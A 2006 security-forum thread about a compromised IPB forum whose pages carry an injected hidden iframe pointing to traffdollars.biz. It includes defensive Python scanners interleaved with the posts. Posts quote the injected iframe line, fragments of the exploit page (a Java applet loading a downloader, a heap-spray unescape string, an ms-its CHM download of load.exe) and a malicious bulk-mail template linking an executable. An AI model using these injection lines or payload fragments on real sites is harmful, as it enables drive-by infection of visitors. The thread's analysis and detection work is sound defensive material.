website and forum virus - help please !!

Discussion in 'malware problems & news' started by davlam, Feb 25, 2006.

Thread Status:
Not open for further replies.
  1. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    Hi,

    My mate has a website and forum.

    Whenever I go to my mate's site or forum home page using IE (Firefox does not exhibit this), BitDefender goes nuts, finding three virus elements:

    Exploit.Win32.WMF-PFV
    Exploit.IECrashJS2.Gen
    Exploit.Onload.A

    Other members running AVG and Panda get the same alerts (only IE, not FF).

    It seems to stem (we think) from this line, which is appearing in the HTML of many pages on his site and forum.


    Code:
    <body>
    <iframe src="http://traffdollars.biz/dl/adv553.php" width=1 height=1></iframe>

    He removes this line from the page HTML and there are no more alerts.

    Secondly, after a period of time this code reappears in the HTML of the pages he has 'cleaned'. He has even downloaded his complete site, run a virus check, fixed everything and re-uploaded. Then after a period it's back again.

    He has taken the site down, but the disabled login to the forum is still there if you want to try it. Use IE, but make sure your antivirus is up to it. The minute the page loads your AV will go nuts.

    I thought this might have been down to the WMF vulnerability that MS patched in January, but the servers of his host are Linux.

    Sorry for not explaining very well, but we are now completely stumped.

    It may well be a server/host issue, but it will be Monday before he can contact them again.

    There was a suggestion that the route into his account was via the forum, but I think that was a guess with no basis in fact or the host finding anything. IPB say update to the latest version, but they would say that anyway.

    Can anyone help?

    Cheers,

    PS: oh yeah, the link to the forum, as you won't get the home page of his site. I told him to create a basic temporary one that was clean and we'd see if it got hacked, so there is one there in the root with just text links.

    Code:
    http://www.stbees.org.uk/sbforum
     
    Last edited: Feb 25, 2006
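
The injected line in the post above is the classic hidden-iframe pattern: a 1x1 frame whose src points at a domain the site does not own. The following is an added example (not code from the thread, from IPB, or from the site owner) that walks a downloaded copy of a site and reports every iframe that is tiny, hidden by style, or off-site. The sample page embedded in it is constructed; only the traffdollars.biz line is taken from the post, and "www.stbees.org.uk" is assumed to be the legitimate host. It works on any HTML string, so it can equally be run over template text or other HTML pulled out of the forum database.

```python
"""Find injected, near-invisible iframes in a downloaded site.

Added example, not code from the original thread or from IPB. The sample
page is constructed; only the traffdollars.biz iframe is from the post."""
import os
import sys
from html.parser import HTMLParser
from urllib.parse import urlsplit

SCAN_SUFFIXES = (".html", ".htm", ".php", ".tpl")  # assumption: typical site/IPB files


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True when a width/height attribute is 1 px or less (a hidden frame)."""
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    try:
        return int(v) <= 1
    except ValueError:
        return False


def _hidden_by_style(style):
    s = style.replace(" ", "").lower()
    return "display:none" in s or "visibility:hidden" in s


def find_hidden_iframes(html, site_host):
    """Return [(src, [reasons])] for iframes that are tiny, hidden or off-site."""
    parser = _IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reasons = []
        host = urlsplit(src).hostname
        if host and host.lower() != site_host.lower():
            reasons.append("off-site host " + host)
        if _tiny(attrs.get("width", "")) or _tiny(attrs.get("height", "")):
            reasons.append("1px-or-smaller box")
        if _hidden_by_style(attrs.get("style", "")):
            reasons.append("hidden by style")
        if reasons:
            findings.append((src, reasons))
    return findings


def scan_tree(root, site_host):
    """Walk a downloaded site and report suspicious iframes per file."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read(), site_host)
            if hits:
                report[path] = hits
    return report


# Constructed sample page: one injected frame, one legitimate same-site frame.
SAMPLE_PAGE = """<html><body>
<iframe src="http://traffdollars.biz/dl/adv553.php" width=1 height=1></iframe>
<p>St Bees forum</p>
<iframe src="/sbforum/stats.php" width=300 height=200></iframe>
</body></html>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1], "www.stbees.org.uk").items():
            for src, reasons in hits:
                print(path, src, ", ".join(reasons))
    else:
        print(find_hidden_iframes(SAMPLE_PAGE, "www.stbees.org.uk"))
```

Run it as `python scan.py /path/to/site_download` against the copy that was pulled down for the virus check; a file-level AV scan will not flag a plain iframe tag, which is why the cleaned copy kept "passing".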
  2. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Sorry, I think there is something really, badly wrong with your friend's server. Something has clearly been compromised; hxxp://traffdollars.biz/dl/adv553.php is part of an exploit/spyware gang and it's possible that they hacked their way into the server to plant these exploits. This has nothing to do with the fact that the server runs on Linux: these are exploits targeted at the visitors (so as to compromise their machines), but it looks like something on the server was hacked in the first place.
     
    Last edited by a moderator: Feb 26, 2006
  3. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    Many thanks for the reply.

    After initial investigation my feeling was that it was the server and not the host site, but his host was not supporting that theory, so we had to look at other possible solutions.

    And some info I found pointed to the WMF vulnerability, but I suppose, as you say, that's at the recipient end and not the carrier (host/server).

    Thanks, I'll feed that back...

    So pressure moves to his host.

    Cheers
     
    Last edited: Feb 25, 2006
  4. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    Very much so....

    AntiVir Found Exploit/MS06-001.WMF exploit
    ArcaVir Found Trojan.Downloader.Agent.Acd
    Avast Found MS06-001 WMF Exploit
    AVG Antivirus Found nothing
    BitDefender Found Exploit.Win32.WMF-PFV
    ClamAV Found Exploit.WMF.A
    Dr.Web Found Exploit.MS05-053
    F-Prot Antivirus Found exploit named CVE-2005-4560
    Fortinet Found nothing
    Kaspersky Anti-Virus Found Trojan-Downloader.Win32.Agent.acd
    NOD32 Found a variant of Win32/Exploit.WMF
    Norman Virus Control Found W32/Exploit.Gen
    UNA Found Exploit.WMF.Agent
    VBA32 Found Exploit.WMF

    Code:
    Cascading Style Sheet(CSS 467), for Invision Power Board 2.0.0
    Author: James A. Mathias, admin [I]at[/I] leihu.com, http://www.1lotus.com 
    Copyright: 2004 Invision Power Services, all rights reserved
    1lotus is a Web Development and Design....wonder if they figure into the problem ?
     
  5. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Interesting is the fact that the traffdollars.biz page "sniffs" the user-agent string, server-side: I did not see anything on the exploit page in Firefox (just an empty page) and was not able to download anything with wget, but using the --user-agent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" in wget did download the non-empty exploit page. There are various nasties in there:

    - the well known wmf exploit (http://www.microsoft.com/technet/security/advisory/912840.mspx)

    - a javascript "fill memory" exploit (http://www.microsoft.com/technet/security/advisory/911302.mspx)

    - mhtml exploit (http://www.f-secure.com/v-descs/exp_mht.shtml)

    - Trojan-Downloader.Java.OpenStream.c, Trojan.Java.ClassLoader.h, Trojan.Java.ClassLoader.d, all in loaderadv553.jar (Exploit.ByteVerify)

    - Trojan-Downloader.Java.OpenConnection.aj (Exploit.ByteVerify) in java.jar

    - Trojan-Downloader.Win32.Small.ckj (loaderadv553.exe, x.chm), this one was not recognized by Ewido, I just sent the sample to them.


    No new exploits, but still a load of crap. This stinks like Coolwebsearch.
     
    Last edited: Feb 26, 2006
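
The user-agent sniffing TNT describes above is what makes these pages look empty to Firefox, wget and most crawlers. The block below is an added example (not from the thread) of the same check done systematically: fetch one URL with several User-Agent strings and compare body hashes; differing hashes mean the server is cloaking per browser. The `fetch` parameter is injectable so the logic can be exercised offline against the constructed `fake_cloaking_server`; the default really connects with urllib. The MSIE 7.0b string is the one from the post; the other agent strings are assumptions.

```python
"""Probe a URL with several User-Agent strings and detect server-side cloaking.

Added example, not code from the thread. `fake_cloaking_server` is a
constructed stand-in for the kind of page TNT describes."""
import hashlib
import urllib.request

DEFAULT_AGENTS = {
    "msie6_xp": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    "msie7_vista": "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",  # from the post
    "firefox": "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.8) Gecko/20060223 Firefox/1.5.0.1",
    "wget": "Wget/1.10.2",
}


def fetch_with_agent(url, agent, timeout=10):
    """Real fetch: one GET with the given User-Agent header."""
    req = urllib.request.Request(url, headers={"User-Agent": agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def probe_cloaking(url, agents=DEFAULT_AGENTS, fetch=fetch_with_agent):
    """Return ({agent_name: (sha256, length)}, differs).

    `differs` is True when at least two agents received different bodies.
    A network error is recorded as its own distinct 'body' so that a server
    which drops non-IE clients still shows up as cloaking."""
    results = {}
    for name, ua in agents.items():
        try:
            body = fetch(url, ua)
        except Exception as exc:
            body = ("ERROR: %s" % exc).encode()
        results[name] = (hashlib.sha256(body).hexdigest(), len(body))
    distinct = {digest for digest, _ in results.values()}
    return results, len(distinct) > 1


def fake_cloaking_server(url, agent):
    """Constructed stand-in: only MSIE agents get the payload page."""
    if "MSIE" in agent:
        return b'<html><iframe src="xpladv799.wmf" width=1 height=1></iframe></html>'
    return b"<html></html>"


if __name__ == "__main__":
    res, differs = probe_cloaking("http://example.invalid/", fetch=fake_cloaking_server)
    for name, (digest, length) in res.items():
        print("%-12s %6d bytes  %s" % (name, length, digest[:16]))
    print("cloaking:", differs)
```

Do this from a throwaway VM, not a production box: the whole point is that the IE-looking request is the one that gets the exploit page back.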
  6. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    And how.

    Opera brings up a redirect page but nothing happens.

    p692698-1-traffd_opera.gif
    _________________________________________________

    Using IE:

    p692698-2-traffd_redirect.gif
    _________________________________________________

    Looking up IP address for domain: traffdollars.biz
    The IP address for the domain is: 85.249.23.119

    Looking up the domain name for IP: 85.249.23.119
    The domain name for the IP address is: sr-customers-23-119.justdns.org
    ________________________________________________

    The main page had the four exploits you mentioned (some code removed):

    1) java exploit

    applet archive="java.jar" [removed] value="http://traffweb.biz/dl/loaderadv799.exe

    p692698-3-traffd_jar.gif

    p692698-4-traffd_java.gif
    _________________________________________________

    loaderadv799.exe did not attempt to download, so this exploit didn't work here.


    2) wmf exploit

    <iframe src="xpladv799.wmf" width=1 height=1></iframe>

    The wmf file was cached here on Win2k without any download prompt but didn't do anything,
    since wmf is not associated with any program here:

    p692698-5-traffd_wmfdl.gif
    _________________________________________________

    p692698-6-traffd_wmfcache2.gif
    _________________________________________________

    3) javascript "fill memory" exploit

    iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm iframe

    script Language="JavaScript"
    .....

    mem = mem + unescape
    ("⑴廴쀫⯿"+
    "惠诠⯽臉壩"+
    "⮤ⷀᅭ?씃"+
    "줫ﻧ?玁ꥄ䩧菍"+
    "ﳫ畁쵈퟿枪䁊"+
    "켔쵎辩켥枩佅星쵊"+
    "⟃촢枙ꕊ报쵊柃墵"+
    .....

    p692698-7-traffd_fillmem.gif
    ____________________________________________


    4) mhtml exploit - using a fake .chm file to download the trojan:

    SCRIPT LANGUAGE="JavaScript"
    [removed]
    obj = "<object data=\"ms-its:mhtml:file";
    hxxp: / / traffweb.biz/dl/adv799/x.chm::/load.exe


    p692698-8-traffd_chmcache.gif
    _________________________________________________

    p692698-9-traffd_chmscan.gif
    _________________________________________________

    load.exe attempts to download. This was the only one of the exploits
    that attempted a download:

    p692698-10-traffd_downloader2m.gif
    _________________________________________________

    There was a log file cached which had this entry, showing the abortion of the download:

    LOG: Reporting Code Download Completion: (hr:80004004 (FAILED), CLASSID: 11111111...,...x.chm::/load.exe)
    ______________________________________________


    ---
     
    Last edited: Feb 27, 2006
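
The "fill memory" page Rmus quotes above builds its buffer with `mem = mem + unescape("%u....")`, the standard heap-spray idiom: each `%uXXXX` becomes one 16-bit code unit in IE's memory, so a long run of `%u9090` lays down a NOP sled with the shellcode at the end. The following is an added example (not from the thread) that decodes such a string into the byte image IE would hold and splits it into sled and payload. The garbled characters in the post are the rendered form of such a string, so the input here is constructed.

```python
"""Decode JavaScript unescape("%uXXXX") strings and flag heap-spray traits.

Added example, not from the thread. SAMPLE is constructed."""
import re

_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(s):
    """Mirror JS unescape(): %uXXXX -> code unit, %XX -> one code unit < 256."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def memory_image(s):
    """Bytes as IE stores the JS string: UTF-16LE code units (lone surrogates kept)."""
    return js_unescape(s).encode("utf-16-le", "surrogatepass")


def longest_byte_run(buf):
    """(byte, length) of the longest run of one repeated byte value."""
    best = (None, 0)
    run, prev = 0, None
    for b in buf:
        run = run + 1 if b == prev else 1
        prev = b
        if run > best[1]:
            best = (b, run)
    return best


def spray_indicators(buf, min_run=64):
    """A long run of one byte (0x90 NOP, or the 0x0c/0x0d fillers used when
    the spray doubles as the overwritten pointer) is the spray signature."""
    byte, length = longest_byte_run(buf)
    return {"longest_byte_run": (byte, length), "suspicious": length >= min_run}


def split_sled_and_payload(buf):
    """If the buffer opens with a sled of one byte, return (filler, sled_len, tail)."""
    if not buf:
        return None, 0, b""
    filler, i = buf[0], 0
    while i < len(buf) and buf[i] == filler:
        i += 1
    return filler, i, buf[i:]


# Constructed: 100 x %u9090 (200 NOP bytes) followed by a 4-byte stand-in payload.
SAMPLE = "%u9090" * 100 + "%u4141%u4242"

if __name__ == "__main__":
    img = memory_image(SAMPLE)
    filler, n, tail = split_sled_and_payload(img)
    print("image %d bytes, sled of 0x%02x x %d, payload %s" % (len(img), filler, n, tail.hex()))
    print(spray_indicators(img))
```

On a real capture, paste the concatenated `unescape` arguments (in order) as the input; the tail after the sled is what to hand to a disassembler.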
  7. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
  8. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    I went to stbees.org.uk/sbforum and got an ActiveX alert, and at the same time i got a file DL prompt for the xpladv553.wmf exploit from traffdollars.biz and Bitdefender jumped in to block it.

    so-1-stbees12tf.png

    I must be lucky lol, because straight after cancelling the above attempts, I got a further NINE, yes count them, attempted DLs of different variations. As soon as I cancelled one the next popped up, right through all nine.

    so-2-stbees25ux.png

    I've never had so many all at once like that, quite an experience, but still secure after the events !

    davlam i hope that you and your friend manage to fix soon !


    StevieO
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I hope so too! BTW - that's quite a Christmas tree display of download attempts you had!

    There was another attempt to connect out that I didn't allow at the time. The site is back up so I decided to see what happens:

    p692897-1-traffd_ms1.gif

    Turns out to be Microsoft:

    NetRange: 207.46.0.0 - 207.46.255.255
    NetName: MICROSOFT-GLOBAL-NET

    Allowing it to connect, it attempts to download a dll:

    p692897-2-traffd_ms3.gif

    This line is in one of the html files:

    hrResponseHdr: 0, URL: (hxxp: //activex.microsoft.com/objects/ocget.dll)

    A search for this dll found a reference to it being used to bypass pop-up blockers:

    http://blogs.securiteam.com/index.php/archives/138#comment-697

    And so it goes....

    ----
     
  10. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    They're part of the same exploit loaded nine times (the iframes in lines 6-14). I've seen this exploit also on ~snip....removed link per TOS~ (don't go there).

    It's the one that opens the prompt window shown by Rmus (the one on the top):

    p692911-1-traffd_downloader.gif
     


    Last edited by a moderator: Feb 27, 2006
  11. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    wow !!

    thanks guys,

    i'm just back from a day out and am going to check with the site owner now as to what the progress is..

    back soon.

    thanks very much :thumb:
     
  12. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    My mate has forwarded our combined comments to his host and they are following it up. The main initial action is to secure the site, clean it and relocate it to a secure pro hosting package (though why a normal hosting package should be less secure I don't know).
    As far as the source of the hack, this is still under investigation.
    There is still a suggestion that the forum was the entry point, i am personally doubtful of that but i am no expert.
    In any case the forum is being upgraded to the latest IPB release.
    I will report back as and when I can.
     
  13. DrMac

    DrMac Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    2
    My thanks to Davlam for his direct and very useful help and also to you guys for yours, even if I don't understand 3/4 of it! The 1/4 I did understand gave me nightmares, so perhaps just as well that was all I understood.

    Unfortunately, it doesn't look as if the American technicians believe you. (The people I deal with are UK based, but the servers are in America).
     
  14. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    TNT

    Yes, thanks for that! I tried to go to ~snip....link removed per TOS~ but it wasn't up, so I tried a few of the other ones again that are similar. Not much real software etc. to be had, but plenty of attempted DLs and exploits lol.

    davlam

    Great, keep us posted.


    StevieO
     
    Last edited by a moderator: Feb 27, 2006
  15. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    In case you are wondering who the new member DrMac is, he's the mate whose site we are discussing (in case you didn't guess).

    PS:

    What does anyone think about the 'way in' being through the forum, as has been suggested to us?
     
  16. wng_z3r0

    wng_z3r0 Registered Member

    Joined:
    Feb 27, 2006
    Posts:
    1
    Hello. I don't know how you are being exploited this time. Just some info. A little while back, http://forums.amd.com was also hacked and an <iframe> was placed to link to toolbarbiz. The support team there said that the reason for the attack was un-updated forum software.

    So that may be the issue. Is your forum software completely up to date? Also, do you have raw server logs that you can look at? It may prove useful for pinpointing the attack vector.

    wng
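
Raw server logs are the one artefact that can settle the "was the forum the way in" question, because an attacker who reaches the admin panel through the web leaves a request trail there. The block below is an added example (not from the thread) of a first-pass triage over Apache combined-format lines: it pulls every request to the IPB admin script and every POST under the forum, groups them by client IP, and lists IPs that reached the admin panel but are not on the known-admin list. The log lines and IP addresses are constructed; `admin.php` as the IPB 2.x admin script is an assumption (the `index.php?act=` paths are the ones visible in the thread's own email template).

```python
"""First-pass triage of Apache combined logs for a forum admin-panel intrusion.

Added example, not from the thread. SAMPLE_LOG and all IPs are constructed."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage(lines, known_admin_ips, forum_prefix="/sbforum/", admin_script="admin.php"):
    """Group admin-panel hits and forum POSTs by IP; flag unknown admin-panel IPs."""
    admin_hits = defaultdict(list)  # ip -> [(time, method, path)]
    posts = defaultdict(list)       # ip -> [(time, path)]
    for line in lines:
        r = parse(line)
        if not r or not r["path"].startswith(forum_prefix):
            continue
        rel = r["path"][len(forum_prefix):]
        if rel.startswith(admin_script):
            admin_hits[r["ip"]].append((r["time"], r["method"], r["path"]))
        if r["method"] == "POST":
            posts[r["ip"]].append((r["time"], r["path"]))
    unknown = sorted(ip for ip in admin_hits if ip not in known_admin_ips)
    return {
        "admin_hits": dict(admin_hits),
        "posts": dict(posts),
        "unknown_admin_ips": unknown,
    }


# Constructed sample: an unknown IP logs in, opens the admin panel and POSTs to
# the bulk-mail function; the real admin (203.0.113.9) only views the panel.
SAMPLE_LOG = '''\
198.51.100.7 - - [24/Feb/2006:02:13:41 +0000] "GET /sbforum/index.php?act=Login&CODE=00 HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [24/Feb/2006:02:13:58 +0000] "POST /sbforum/index.php?act=Login&CODE=01 HTTP/1.1" 302 0 "http://www.stbees.org.uk/sbforum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [24/Feb/2006:02:14:20 +0000] "GET /sbforum/admin.php HTTP/1.1" 200 8800 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [24/Feb/2006:02:15:05 +0000] "POST /sbforum/admin.php?adsess=abc&act=mail HTTP/1.1" 200 4100 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.9 - - [24/Feb/2006:09:30:00 +0000] "GET /sbforum/admin.php HTTP/1.1" 200 8800 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.8) Gecko/20060223 Firefox/1.5.0.1"
192.0.2.55 - - [24/Feb/2006:10:02:11 +0000] "GET /sbforum/index.php?showtopic=12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
'''

if __name__ == "__main__":
    result = triage(SAMPLE_LOG.splitlines(), known_admin_ips={"203.0.113.9"})
    for ip in result["unknown_admin_ips"]:
        print("unknown IP reached admin panel:", ip)
        for when, method, path in result["admin_hits"][ip]:
            print("   ", when, method, path)
```

The next step after this pass is to take the first timestamp of each flagged IP and look at everything that IP did before it (password-reset requests, profile edits, unusual GET parameters), which is where the actual entry method usually shows.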
     
  17. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Several articles have noted that a lot of current malware is combining exploits hoping, I suppose, to find users with at least one vulnerability. The e-card (postcards.com) I posted in another thread, had five exploits.

    One article mentioned at DSLR had this comment: ( http://www.securescience.net/advisories/SSC_MSAT_FEB_02_2006-public.pdf )

    "Examination of these files show that they lead to multiple exploits in an effort to force the user to download the A-311 Death backdoor (bugfix.exe)."


    With the traffdollars.biz site in question, the file that it wants to force the user to download is load.exe (aka loaderadv###.exe) which is the main workhorse. Once this file executes, it’s pretty much all over.

    Watching it run shows it to be a typical downloader trojan that connects out to download more trojans, that in turn connect out… etc. Here are a few:

    p693904-1-kerio.gif
    ______________________________________________

    Some files I archived:

    p693904-2-traffd.gif
    _______________________________________________

    All of the files had already been picked up by many AV. Some File Scans


    The obligatory Spyware Warning:

    p693904-3-spysh.gif
    _________________________________________________

    The above is the secure32.html page, shown in the scan to be the Trojan.SpySheriff.C. All of the "click here" links at the bottom connect the user to the spysheriff site:

    hxxp ://www.spy-sheriff.com/?advid=1 To protect from the Spyware - click here
    hxxp ://www.spy-sheriff.com/? To prevent information transmission - click here
    hxxp ://www.spy-sheriff.com/? To delete the history of your activity, click here
    _______________________________________________


    The wnlogow.sys and avload.dll files are especially interesting:

    p693904-4-wnlogow-scan.gif

    p693904-5-avload-scan2.gif

    http://products.antivir.de/en/threats/BDS_Haxdoor_GJ_3_details.html

    Registry

    The following registry keys are added in order to load the service after reboot:
    -[HKLM\SYSTEM\CurrentControlSet\Services\wnlogow]
    • ImagePath = \??\%SYSDIR%\wnlogow.sys


    Side effects:

    • Drops malicious files
    • Records keystrokes
    • Registry modification
    • Steals information
    • Third party control


    Rootkit Technology

    It is a malware-specific technology.
    •The malware hides its presence from system utilities, security applications
    and in the end, from the user.


    Hides the following:
    • Its own files


    Method used:
    • Hidden from Windows API

    ----------------

    http://www.hijackthis-forum.de/archive/index.php/t-14545.html

    This is from blacklight:
    02/21/06 16:54:54 [Info]: Hidden file: C:\WINDOWS\system32\avload32.dll
    02/21/06 16:54:55 [Info]: Hidden file: C:\WINDOWS\system32\wnlogow.sys

    This is from rootkitrevealer:
    C:\WINDOWS\system32\avload32.dll 2/20/2006 4:13 PM 12.31 KB Hidden from Windows API.
    C:\WINDOWS\system32\wnlogow.sys 2/20/2006 4:13 PM 5.36 KB Hidden from Windows API.
    ____________________________________________________________________


    TNT’s references to the documentation for these exploits at this site show there are patches for them.
    But there must be enough people out there who either have not patched, or have no other protection in place;
    otherwise, it would not be worthwhile for a site like this to continue to exist.
    That is to say, someone is making money.

    ----
     
    Last edited: Feb 28, 2006
  18. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    just saying thanks again folks, this info is excellent and far beyond anything I could have come up with.

    Boy, am I glad I decided to post this in here.

    updates will follow.

    @ wng_z3r0 . i'll check with drmac and find out if the raw logs are available.
     
  19. Lollan

    Lollan Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    288
  20. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    It looks like traffdollars(dot)biz and traffweb(dot)biz have been taken down.

    EDIT: actually, no they are back up. :mad:
     
  21. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    hi folks,

    well i have good news and bad..

    The good news is that DrMac's site and forum are now up and running again. They have been completely virus checked and the forum upgraded to the latest IPB revision.

    The host has moved the site to another server. They call the account pro-hosting and it's on a completely different server than the standard hosting. By their own admission this pro-hosting server is much more secure than the other. Take what you like from that....

    The bad news. Well, it doesn't look like we are going to get to the bottom of the source. Or if it has been found, then we are not being told about it. I hate not knowing the root cause, but there is nothing we can do to find out what else has been done.

    So this is the end of the saga as far as we are concerned, unless it rears its head again.

    I'd just like to thank everyone for their help, it has been very informative and useful.

    Thanks again,

    cheers,

    dave
     
  22. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Hi davlam

    Great news ! Glad i was able to play a small part in all this.


    StevieO
     
  23. DrMac

    DrMac Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    2
    Well, I'm afraid I spoke too soon.

    Last week, all the files were uploaded to the new server.
    The forum was also uploaded and updated to the latest version (though I noted as soon as I logged in that there is another update available - I wonder if my experiences are anything to do with it!).

    Everything seemed OK for a couple of days but this morning when I logged in to the admin area I saw in the activity log that a bulk email had been created (but fortunately not sent).
    When I looked at and clicked on preview, my AV (Panda) got very excited and blocked or quarantined about a dozen viruses.

    The email that had been created was >>

    {member_name},
    <a href="http : //*** traffdollars.biz/dl/loadadv553.exe" target="_blank">please click</a>


    -------------------------------------
    {board_name} Statistics:
    -------------------------------------
    Registered Users: {reg_total}
    Total Posts: {total_posts}
    Busiest Time: {busy_count} users were online on {busy_time}

    -------------------------------------
    Handy Links
    -------------------------------------
    Board Address: {board_url}
    Log In: {board_url}?act=Login&CODE=00
    Lost Password Recovery: {board_url}?act=Reg&CODE=10

    -------------------------------------
    How to unsubscribe
    -------------------------------------
    Visit your email preferences ({board_url}?act=UserCP&CODE=02) and ensure that the box for 'Send me any updates sent by the board administrator' is unchecked and submit the form

    <<At this point was the IFrame line pointing to the traffdollars site again>>
     
  24. Nomadski

    Nomadski Registered Member

    Joined:
    Mar 12, 2006
    Posts:
    1
    Hey Guys,

    I'm afraid I have the same issue. Using IPB 2.0, I had all the latest patches installed, and just about to upgrade to 2.15

    Today my board got hacked, and an iframe with the traffdollars.biz link was added to all user prefixes, installed in several portal boxes, and so on.
    As if this is not worth enough, a bulk mail with an iframe and a link to an .exe file has been sent out to almost 2,000 users. Clever enough, the hackers did not mail any moderators or admins. The account that was used for the intrusion was my tech admin's account.

    Now, if I read that the same happened again, I'm worrying about what's next...

    I changed all passwords and shut down the board for now.

    Any suggestions what could have happened?

    Thanks!
     